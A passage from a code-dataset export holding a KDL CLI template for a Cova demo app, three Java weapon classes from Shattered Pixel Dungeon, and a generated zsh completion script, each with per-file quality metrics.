"qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00JCIV00/cova | examples/basic_app_meta/arg_templates/basic-app-template.kdl | # This KDL template is formatted to match the `usage` tool as detailed here: https://sr.ht/~jdx/usage/
name "basic-app"
bin "basic-app"
about "A basic user management application designed to highlight key features of the Cova library."
version "0.10.2"
author "00JCIV00"
cmd "new" help="Add a new user." {
flag "-f,--first-name" help="User's First Name."
flag "-l,--last-name" help="User's Last Name."
flag "-a,--age" help="User's Age."
flag "-p,--phone" help="User's Phone #."
flag "-A,--address" help="User's Address."
arg "is-admin" help="Add this user as an admin?"
}
cmd "open" help="Open or create a users file." {
arg "__nosubdescriptionsprovided__" help=""
}
cmd "list" help="List all current users." {
cmd "filter" help="List all current users matching the provided filter. Filters can be exactly ONE of any user field." {
flag "-i,--id" help="The 'id' Option."
flag "-a,--admin" help="The 'admin' Option."
flag "-A,--age" help="The 'age' Option."
flag "-f,--first-name" help="The 'first-name' Option."
flag "-l,--last-name" help="The 'last-name' Option."
flag "-p,--phone" help="The 'phone' Option."
flag "-d,--address" help="The 'address' Option."
}
}
cmd "clean" help="Clean (delete) the default users file (users.csv) and persistent variable file (.ba_persist)." {
alias "delete"
flag "-f,--file" help="Specify a single file to be cleaned (deleted) instead of the defaults."
}
cmd "view-lists" help="View all lists (csv files) in the current directory."
| 1,575 | basic-app-template | kdl | en | unknown | unknown | {} | 0 | {} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Sword.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Sword extends MeleeWeapon {
{
image = ItemSpriteSheet.SWORD;
tier = 3;
}
}
| 1,024 | Sword | java | en | java | code | {"qsc_code_num_words": 144, "qsc_code_num_chars": 1024.0, "qsc_code_mean_word_length": 5.32638889, "qsc_code_frac_words_unique": 0.65277778, "qsc_code_frac_chars_top_2grams": 0.04302477, "qsc_code_frac_chars_top_3grams": 0.05084746, "qsc_code_frac_chars_top_4grams": 0.07431551, "qsc_code_frac_chars_dupe_5grams": 0.10691004, "qsc_code_frac_chars_dupe_6grams": 0.07301173, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02150538, "qsc_code_frac_chars_whitespace": 0.18261719, "qsc_code_size_file_byte": 1024.0, "qsc_code_num_lines": 33.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 31.03030303, "qsc_code_frac_chars_alphabet": 0.8948626, "qsc_code_frac_chars_comments": 0.76269531, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.0, "qsc_codejava_score_lines_no_logic": 0.25, "qsc_codejava_frac_words_no_modifier": 0.0, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": null, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/RoundShield.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class RoundShield extends MeleeWeapon {
{
image = ItemSpriteSheet.ROUND_SHIELD;
tier = 3;
}
@Override
public int max(int lvl) {
return 3*(tier+1) + //12 base, down from 20
lvl*(tier-1); //+2 per level, down from +4
}
@Override
public int defenseFactor( Char owner ) {
return 5+2*level(); //5 extra defence, plus 2 per level;
}
public String statsInfo(){
if (isIdentified()){
return Messages.get(this, "stats_desc", 5+2*level());
} else {
return Messages.get(this, "typical_stats_desc", 5);
}
}
} | 1,606 | RoundShield | java | en | java | code | {"qsc_code_num_words": 221, "qsc_code_num_chars": 1606.0, "qsc_code_mean_word_length": 5.27149321, "qsc_code_frac_words_unique": 0.57918552, "qsc_code_frac_chars_top_2grams": 0.0583691, "qsc_code_frac_chars_top_3grams": 0.1304721, "qsc_code_frac_chars_top_4grams": 0.04892704, "qsc_code_frac_chars_dupe_5grams": 0.07038627, "qsc_code_frac_chars_dupe_6grams": 0.04806867, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02579666, "qsc_code_frac_chars_whitespace": 0.17932752, "qsc_code_size_file_byte": 1606.0, "qsc_code_num_lines": 53.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.30188679, "qsc_code_frac_chars_alphabet": 0.85811836, "qsc_code_frac_chars_comments": 0.54047323, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07692308, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.03788904, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.11538462, "qsc_codejava_score_lines_no_logic": 0.26923077, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Spear.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Spear extends MeleeWeapon {
{
image = ItemSpriteSheet.SPEAR;
tier = 2;
DLY = 1.5f; //0.67x speed
RCH = 2; //extra reach
}
@Override
public int max(int lvl) {
return Math.round(6.67f*(tier+1)) + //20 base, up from 15
lvl*Math.round(1.33f*(tier+1)); //+4 per level, up from +3
}
}
| 1,248 | Spear | java | en | java | code | {"qsc_code_num_words": 185, "qsc_code_num_chars": 1248.0, "qsc_code_mean_word_length": 4.84864865, "qsc_code_frac_words_unique": 0.65945946, "qsc_code_frac_chars_top_2grams": 0.0367893, "qsc_code_frac_chars_top_3grams": 0.04347826, "qsc_code_frac_chars_top_4grams": 0.06354515, "qsc_code_frac_chars_dupe_5grams": 0.09141583, "qsc_code_frac_chars_dupe_6grams": 0.06243032, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03766105, "qsc_code_frac_chars_whitespace": 0.19150641, "qsc_code_size_file_byte": 1248.0, "qsc_code_num_lines": 41.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.43902439, "qsc_code_frac_chars_alphabet": 0.85133796, "qsc_code_frac_chars_comments": 0.68429487, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.2, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00JCIV00/cova | examples/logger_meta/tab_completions/_logger-completion.zsh | #compdef logger
# This Tab Completion script was generated by the Cova Library.
# Details at https://github.com/00JCIV00/cova
# Zsh Completion Installation Instructions for logger
# 1. Place this script in a directory specified in your $fpath, or a new one such as
# ~/.zsh/completion/
#
# 2. Ensure the script has executable permissions:
# chmod +x _logger-completion.zsh
#
# 3. Add the script's directory to your $fpath in your .zshrc if not already included:
# fpath=(~/.zsh/completion $fpath)
#
# 4. Enable and initialize completion in your .zshrc if you haven't already (oh-my-zsh does this automatically):
# autoload -Uz compinit && compinit
#
# 5. Restart your terminal session or source your .zshrc again:
# source ~/.zshrc
# Associative array to hold Commands, Options, and their descriptions with arbitrary depth
typeset -A cmd_args
cmd_args=(
"logger" "help usage --log-level --help --usage"
)
# Generic function for command completions
_logger_completions() {
local -a completions
# Determine the current command context
local context="logger"
for word in "${words[@]:1:$CURRENT-1}"; do
if [[ -n $cmd_args[${context}_${word}] ]]; then
context="${context}_${word}"
fi
done
# Generate completions for the current context
completions=(${(s: :)cmd_args[$context]})
if [[ -n $completions ]]; then
_describe -t commands "logger" completions && return 0
fi
}
_logger_completions "$@" | 1,484 | _logger-completion | zsh | en | shell | code | {"qsc_code_num_words": 199, "qsc_code_num_chars": 1484.0, "qsc_code_mean_word_length": 5.09547739, "qsc_code_frac_words_unique": 0.53768844, "qsc_code_frac_chars_top_2grams": 0.02761341, "qsc_code_frac_chars_top_3grams": 0.02169625, "qsc_code_frac_chars_top_4grams": 0.02564103, "qsc_code_frac_chars_dupe_5grams": 0.0, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01009251, "qsc_code_frac_chars_whitespace": 0.19878706, "qsc_code_size_file_byte": 1484.0, "qsc_code_num_lines": 45.0, "qsc_code_num_chars_line_max": 113.0, "qsc_code_num_chars_line_mean": 32.97777778, "qsc_code_frac_chars_alphabet": 0.84272498, "qsc_code_frac_chars_comments": 0.65229111, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.11111111, "qsc_code_cate_autogen": 1.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.19148936, "qsc_code_frac_chars_long_word_length": 0.04642166, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 1, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.